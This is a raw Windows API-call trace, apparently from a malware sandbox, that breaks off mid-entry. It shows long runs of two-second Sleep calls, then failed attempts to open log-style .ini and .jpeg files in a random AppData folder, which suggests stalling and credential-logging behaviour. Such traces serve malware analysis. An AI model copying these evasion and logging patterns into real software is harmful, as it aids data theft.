[0191.197] Sleep (dwMilliseconds=0x7d0) [0191.213] Sleep (dwMilliseconds=0x7d0) [0191.228] Sleep (dwMilliseconds=0x7d0) [0191.248] Sleep (dwMilliseconds=0x7d0) [0191.260] Sleep (dwMilliseconds=0x7d0) [0191.275] Sleep (dwMilliseconds=0x7d0) [0191.292] Sleep (dwMilliseconds=0x7d0) [0191.310] Sleep (dwMilliseconds=0x7d0) [0191.322] Sleep (dwMilliseconds=0x7d0) [0191.358] Sleep (dwMilliseconds=0x7d0) [0191.369] Sleep (dwMilliseconds=0x7d0) [0191.389] Sleep (dwMilliseconds=0x7d0) [0191.401] Sleep (dwMilliseconds=0x7d0) [0191.415] Sleep (dwMilliseconds=0x7d0) [0191.431] Sleep (dwMilliseconds=0x7d0) [0191.453] Sleep (dwMilliseconds=0x7d0) [0191.462] Sleep (dwMilliseconds=0x7d0) [0191.478] Sleep (dwMilliseconds=0x7d0) [0191.493] Sleep (dwMilliseconds=0x7d0) [0191.515] Sleep (dwMilliseconds=0x7d0) [0191.526] Sleep (dwMilliseconds=0x7d0) [0191.540] Sleep (dwMilliseconds=0x7d0) [0191.556] Sleep (dwMilliseconds=0x7d0) [0191.571] Sleep (dwMilliseconds=0x7d0) [0191.591] Sleep (dwMilliseconds=0x7d0) [0191.603] Sleep (dwMilliseconds=0x7d0) [0191.622] Sleep (dwMilliseconds=0x7d0) [0191.638] Sleep (dwMilliseconds=0x7d0) [0191.649] Sleep (dwMilliseconds=0x7d0) [0191.665] Sleep (dwMilliseconds=0x7d0) [0191.681] Sleep (dwMilliseconds=0x7d0) [0191.700] Sleep (dwMilliseconds=0x7d0) [0191.712] Sleep (dwMilliseconds=0x7d0) [0191.728] Sleep (dwMilliseconds=0x7d0) [0191.743] Sleep (dwMilliseconds=0x7d0) [0191.763] Sleep (dwMilliseconds=0x7d0) [0191.776] Sleep (dwMilliseconds=0x7d0) [0191.806] Sleep (dwMilliseconds=0x7d0) [0191.893] Sleep (dwMilliseconds=0x7d0) [0191.899] Sleep (dwMilliseconds=0x7d0) [0191.915] Sleep (dwMilliseconds=0x7d0) [0191.930] Sleep (dwMilliseconds=0x7d0) [0191.950] Sleep (dwMilliseconds=0x7d0) [0191.963] Sleep (dwMilliseconds=0x7d0) [0191.977] Sleep (dwMilliseconds=0x7d0) [0191.993] Sleep (dwMilliseconds=0x7d0) [0192.013] Sleep (dwMilliseconds=0x7d0) [0192.024] Sleep (dwMilliseconds=0x7d0) [0192.040] Sleep (dwMilliseconds=0x7d0) [0192.055] Sleep (dwMilliseconds=0x7d0) [0192.170] Sleep (dwMilliseconds=0x7d0) [0192.181] Sleep (dwMilliseconds=0x7d0) [0192.195] Sleep (dwMilliseconds=0x7d0) [0192.211] Sleep (dwMilliseconds=0x7d0) [0192.227] Sleep (dwMilliseconds=0x7d0) [0192.247] Sleep (dwMilliseconds=0x7d0) [0192.258] Sleep (dwMilliseconds=0x7d0) [0192.275] Sleep (dwMilliseconds=0x7d0) [0192.289] Sleep (dwMilliseconds=0x7d0) [0192.309] Sleep (dwMilliseconds=0x7d0) [0192.321] Sleep (dwMilliseconds=0x7d0) [0192.355] Sleep (dwMilliseconds=0x7d0) [0192.367] Sleep (dwMilliseconds=0x7d0) [0192.388] Sleep (dwMilliseconds=0x7d0) [0192.398] Sleep (dwMilliseconds=0x7d0) [0192.414] Sleep (dwMilliseconds=0x7d0) [0192.430] Sleep (dwMilliseconds=0x7d0) [0192.449] Sleep (dwMilliseconds=0x7d0) [0192.461] Sleep (dwMilliseconds=0x7d0) [0192.476] Sleep (dwMilliseconds=0x7d0) [0192.493] Sleep (dwMilliseconds=0x7d0) [0192.512] Sleep (dwMilliseconds=0x7d0) [0192.523] Sleep (dwMilliseconds=0x7d0) [0192.539] Sleep (dwMilliseconds=0x7d0) [0192.554] Sleep (dwMilliseconds=0x7d0) [0192.570] Sleep (dwMilliseconds=0x7d0) [0192.594] Sleep (dwMilliseconds=0x7d0) [0192.601] Sleep (dwMilliseconds=0x7d0) [0192.617] Sleep (dwMilliseconds=0x7d0) [0192.634] Sleep (dwMilliseconds=0x7d0) [0192.656] Sleep (dwMilliseconds=0x7d0) [0192.664] Sleep (dwMilliseconds=0x7d0) [0192.679] Sleep (dwMilliseconds=0x7d0) [0192.701] Sleep (dwMilliseconds=0x7d0) [0192.710] Sleep (dwMilliseconds=0x7d0) [0192.726] Sleep (dwMilliseconds=0x7d0) [0192.742] Sleep (dwMilliseconds=0x7d0) [0192.762] Sleep (dwMilliseconds=0x7d0) [0192.773] Sleep (dwMilliseconds=0x7d0) [0192.788] Sleep (dwMilliseconds=0x7d0) [0192.805] Sleep (dwMilliseconds=0x7d0) [0192.820] Sleep (dwMilliseconds=0x7d0) [0192.839] Sleep (dwMilliseconds=0x7d0) [0192.851] Sleep (dwMilliseconds=0x7d0) [0192.866] Sleep (dwMilliseconds=0x7d0) [0192.882] Sleep (dwMilliseconds=0x7d0) [0192.901] Sleep (dwMilliseconds=0x7d0) [0192.914] Sleep (dwMilliseconds=0x7d0) [0192.929] Sleep (dwMilliseconds=0x7d0) [0192.944] Sleep (dwMilliseconds=0x7d0) [0192.964] Sleep (dwMilliseconds=0x7d0) [0192.976] Sleep (dwMilliseconds=0x7d0) [0192.991] Sleep (dwMilliseconds=0x7d0) [0193.007] Sleep (dwMilliseconds=0x7d0) [0193.024] Sleep (dwMilliseconds=0x7d0) [0193.044] Sleep (dwMilliseconds=0x7d0) [0193.054] Sleep (dwMilliseconds=0x7d0) [0193.069] Sleep (dwMilliseconds=0x7d0) [0193.094] Sleep (dwMilliseconds=0x7d0) [0193.100] Sleep (dwMilliseconds=0x7d0) [0193.116] Sleep (dwMilliseconds=0x7d0) [0193.143] Sleep (dwMilliseconds=0x7d0) [0193.156] Sleep (dwMilliseconds=0x7d0) [0193.163] Sleep (dwMilliseconds=0x7d0) [0193.178] Sleep (dwMilliseconds=0x7d0) [0193.194] Sleep (dwMilliseconds=0x7d0) [0193.213] Sleep (dwMilliseconds=0x7d0) [0193.230] Sleep (dwMilliseconds=0x7d0) [0193.243] Sleep (dwMilliseconds=0x7d0) [0193.257] Sleep (dwMilliseconds=0x7d0) [0193.272] Sleep (dwMilliseconds=0x7d0) [0193.296] Sleep (dwMilliseconds=0x7d0) [0193.303] Sleep (dwMilliseconds=0x7d0) [0193.331] Sleep (dwMilliseconds=0x7d0) [0193.355] Sleep (dwMilliseconds=0x7d0) [0193.365] Sleep (dwMilliseconds=0x7d0) [0193.381] Sleep (dwMilliseconds=0x7d0) [0193.397] Sleep (dwMilliseconds=0x7d0) [0193.417] Sleep (dwMilliseconds=0x7d0) [0193.428] Sleep (dwMilliseconds=0x7d0) [0193.443] Sleep (dwMilliseconds=0x7d0) [0193.460] Sleep (dwMilliseconds=0x7d0) [0193.475] Sleep (dwMilliseconds=0x7d0) [0193.495] Sleep (dwMilliseconds=0x7d0) [0193.506] Sleep (dwMilliseconds=0x7d0) [0193.522] Sleep (dwMilliseconds=0x7d0) [0193.537] Sleep (dwMilliseconds=0x7d0) [0193.556] Sleep (dwMilliseconds=0x7d0) [0193.570] Sleep (dwMilliseconds=0x7d0) [0193.584] Sleep (dwMilliseconds=0x7d0) [0193.600] Sleep (dwMilliseconds=0x7d0) [0193.615] Sleep (dwMilliseconds=0x7d0) [0193.639] Sleep (dwMilliseconds=0x7d0) [0193.646] Sleep (dwMilliseconds=0x7d0) [0193.662] Sleep (dwMilliseconds=0x7d0) [0193.679] Sleep (dwMilliseconds=0x7d0) [0193.700] Sleep (dwMilliseconds=0x7d0) [0193.709] Sleep (dwMilliseconds=0x7d0) [0193.724] Sleep (dwMilliseconds=0x7d0) [0193.740] Sleep (dwMilliseconds=0x7d0) [0193.759] Sleep (dwMilliseconds=0x7d0) [0193.771] Sleep (dwMilliseconds=0x7d0) [0193.788] Sleep (dwMilliseconds=0x7d0) [0193.802] Sleep (dwMilliseconds=0x7d0) [0193.818] Sleep (dwMilliseconds=0x7d0) [0193.838] Sleep (dwMilliseconds=0x7d0) [0193.849] Sleep (dwMilliseconds=0x7d0) [0193.865] Sleep (dwMilliseconds=0x7d0) [0193.880] Sleep (dwMilliseconds=0x7d0) [0193.902] Sleep (dwMilliseconds=0x7d0) [0193.912] Sleep (dwMilliseconds=0x7d0) [0193.928] Sleep (dwMilliseconds=0x7d0) [0193.943] Sleep (dwMilliseconds=0x7d0) [0193.964] Sleep (dwMilliseconds=0x7d0) [0193.974] Sleep (dwMilliseconds=0x7d0) [0193.990] Sleep (dwMilliseconds=0x7d0) [0194.006] Sleep (dwMilliseconds=0x7d0) [0194.021] Sleep (dwMilliseconds=0x7d0) [0194.046] Sleep (dwMilliseconds=0x7d0) [0194.052] Sleep (dwMilliseconds=0x7d0) [0194.068] Sleep (dwMilliseconds=0x7d0) [0194.083] Sleep (dwMilliseconds=0x7d0) [0194.113] Sleep (dwMilliseconds=0x7d0) [0194.114] Sleep (dwMilliseconds=0x7d0) [0194.131] Sleep (dwMilliseconds=0x7d0) [0194.156] Sleep (dwMilliseconds=0x7d0) [0194.165] Sleep (dwMilliseconds=0x7d0) [0194.177] Sleep (dwMilliseconds=0x7d0) [0194.200] Sleep (dwMilliseconds=0x7d0) [0194.208] Sleep (dwMilliseconds=0x7d0) [0194.225] Sleep (dwMilliseconds=0x7d0) [0194.239] Sleep (dwMilliseconds=0x7d0) [0194.261] Sleep (dwMilliseconds=0x7d0) [0194.270] Sleep (dwMilliseconds=0x7d0) [0194.291] Sleep (dwMilliseconds=0x7d0) [0194.302] Sleep (dwMilliseconds=0x7d0) [0194.317] Sleep (dwMilliseconds=0x7d0) [0194.355] Sleep (dwMilliseconds=0x7d0) [0194.364] Sleep (dwMilliseconds=0x7d0) [0194.380] Sleep (dwMilliseconds=0x7d0) [0194.395] Sleep (dwMilliseconds=0x7d0) [0194.417] Sleep (dwMilliseconds=0x7d0) [0194.426] Sleep (dwMilliseconds=0x7d0) [0194.442] Sleep (dwMilliseconds=0x7d0) [0194.459] Sleep (dwMilliseconds=0x7d0) [0194.473] Sleep (dwMilliseconds=0x7d0) [0194.496] Sleep (dwMilliseconds=0x7d0) [0194.504] Sleep (dwMilliseconds=0x7d0) [0194.520] Sleep (dwMilliseconds=0x7d0) [0194.536] Sleep (dwMilliseconds=0x7d0) [0194.556] Sleep (dwMilliseconds=0x7d0) [0194.568] Sleep (dwMilliseconds=0x7d0) [0194.582] Sleep (dwMilliseconds=0x7d0) [0194.598] Sleep (dwMilliseconds=0x7d0) [0194.618] Sleep (dwMilliseconds=0x7d0) [0194.629] Sleep (dwMilliseconds=0x7d0) [0194.645] Sleep (dwMilliseconds=0x7d0) [0194.660] Sleep (dwMilliseconds=0x7d0) [0194.677] Sleep (dwMilliseconds=0x7d0) [0194.696] Sleep (dwMilliseconds=0x7d0) [0194.707] Sleep (dwMilliseconds=0x7d0) [0194.723] Sleep (dwMilliseconds=0x7d0) [0194.738] Sleep (dwMilliseconds=0x7d0) [0194.758] Sleep (dwMilliseconds=0x7d0) [0194.770] Sleep (dwMilliseconds=0x7d0) [0194.786] Sleep (dwMilliseconds=0x7d0) [0194.801] Sleep (dwMilliseconds=0x7d0) [0194.821] Sleep (dwMilliseconds=0x7d0) [0194.832] Sleep (dwMilliseconds=0x7d0) [0194.848] Sleep (dwMilliseconds=0x7d0) [0194.863] Sleep (dwMilliseconds=0x7d0) [0194.888] Sleep (dwMilliseconds=0x7d0) [0194.894] Sleep (dwMilliseconds=0x7d0) [0194.910] Sleep (dwMilliseconds=0x7d0) [0194.926] Sleep (dwMilliseconds=0x7d0) [0194.948] Sleep (dwMilliseconds=0x7d0) [0194.957] Sleep (dwMilliseconds=0x7d0) [0194.973] Sleep (dwMilliseconds=0x7d0) [0194.989] Sleep (dwMilliseconds=0x7d0) [0195.008] Sleep (dwMilliseconds=0x7d0) [0195.019] Sleep (dwMilliseconds=0x7d0) [0195.091] Sleep (dwMilliseconds=0x7d0) [0195.101] Sleep (dwMilliseconds=0x7d0) [0195.139] Sleep (dwMilliseconds=0x7d0) [0195.158] Sleep (dwMilliseconds=0x7d0) [0195.196] Sleep (dwMilliseconds=0x7d0) [0195.216] Sleep (dwMilliseconds=0x7d0) [0195.245] Sleep (dwMilliseconds=0x7d0) [0195.285] Sleep (dwMilliseconds=0x7d0) [0195.305] Sleep (dwMilliseconds=0x7d0) [0195.356] Sleep (dwMilliseconds=0x7d0) [0195.382] Sleep (dwMilliseconds=0x7d0) [0195.402] Sleep (dwMilliseconds=0x7d0) [0195.440] Sleep (dwMilliseconds=0x7d0) [0195.477] Sleep (dwMilliseconds=0x7d0) [0195.511] Sleep (dwMilliseconds=0x7d0) [0195.554] Sleep (dwMilliseconds=0x7d0) [0195.565] Sleep (dwMilliseconds=0x7d0) [0195.596] Sleep (dwMilliseconds=0x7d0) [0195.616] Sleep (dwMilliseconds=0x7d0) [0195.640] Sleep (dwMilliseconds=0x7d0) [0195.643] Sleep (dwMilliseconds=0x7d0) [0195.694] Sleep (dwMilliseconds=0x7d0) [0195.720] Sleep (dwMilliseconds=0x7d0) [0195.729] Sleep (dwMilliseconds=0x7d0) [0195.768] Sleep (dwMilliseconds=0x7d0) [0195.784] Sleep (dwMilliseconds=0x7d0) [0195.820] Sleep (dwMilliseconds=0x7d0) [0195.856] Sleep (dwMilliseconds=0x7d0) [0195.870] Sleep (dwMilliseconds=0x7d0) [0195.910] Sleep (dwMilliseconds=0x7d0) [0195.925] Sleep (dwMilliseconds=0x7d0) [0195.955] Sleep (dwMilliseconds=0x7d0) [0196.007] Sleep (dwMilliseconds=0x7d0) [0196.040] Sleep (dwMilliseconds=0x7d0) [0196.069] Sleep (dwMilliseconds=0x7d0) [0196.111] Sleep (dwMilliseconds=0x7d0) [0196.211] Sleep (dwMilliseconds=0x7d0) [0196.238] Sleep (dwMilliseconds=0x7d0) [0196.357] Sleep (dwMilliseconds=0x7d0) [0196.392] Sleep (dwMilliseconds=0x7d0) [0196.413] Sleep (dwMilliseconds=0x7d0) [0196.532] Sleep (dwMilliseconds=0x7d0) [0196.576] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.581] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.599] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0xe [0196.599] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.599] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.599] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.600] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.600] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.600] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.600] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.600] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.600] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.600] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.600] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.600] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.600] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.601] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.601] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.601] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.601] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.601] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.601] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.601] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.601] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.601] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.601] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.601] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.601] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.601] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.601] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.602] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0xe [0196.602] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.602] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.602] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0196.602] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0xe [0196.602] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0196.602] Sleep (dwMilliseconds=0x7d0) [0196.614] Sleep (dwMilliseconds=0x7d0) [0196.657] Sleep (dwMilliseconds=0x7d0) [0196.705] Sleep (dwMilliseconds=0x7d0) [0196.720] Sleep (dwMilliseconds=0x7d0) [0196.766] Sleep (dwMilliseconds=0x7d0) [0196.818] Sleep (dwMilliseconds=0x7d0) [0196.829] Sleep 